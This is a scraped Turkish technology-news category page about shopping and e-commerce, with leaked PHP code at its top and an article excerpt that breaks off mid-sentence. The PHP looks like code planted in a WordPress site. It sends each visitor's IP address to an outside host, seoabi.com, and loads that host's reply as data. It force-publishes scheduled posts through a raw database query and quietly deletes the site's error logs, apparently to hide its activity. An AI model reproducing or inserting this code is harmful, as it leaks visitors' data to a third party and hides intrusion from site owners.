$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> alışveriş | Teknoloji Haberleri

alışveriş kategorisindeki tüm yazılar

Son Yazılar

Elektronik Ticaret Devrimi

Her geçen sene işlem hacmi katlanarak büyümekte olana elektronik ticaret nereye doğru gidiyor? Bu yazımızda hem Türkiye hem dünya genelinde E-Ticareti masaya yatırıyoruz. İnternetin hayatımıza girdiği kadar hızlı bir şekilde alışveriş alışkanlıklarımız da hızla değişmekte. Çok fazla değil, sadece onbeş yıl kadar önce alış veriş yaparken, bir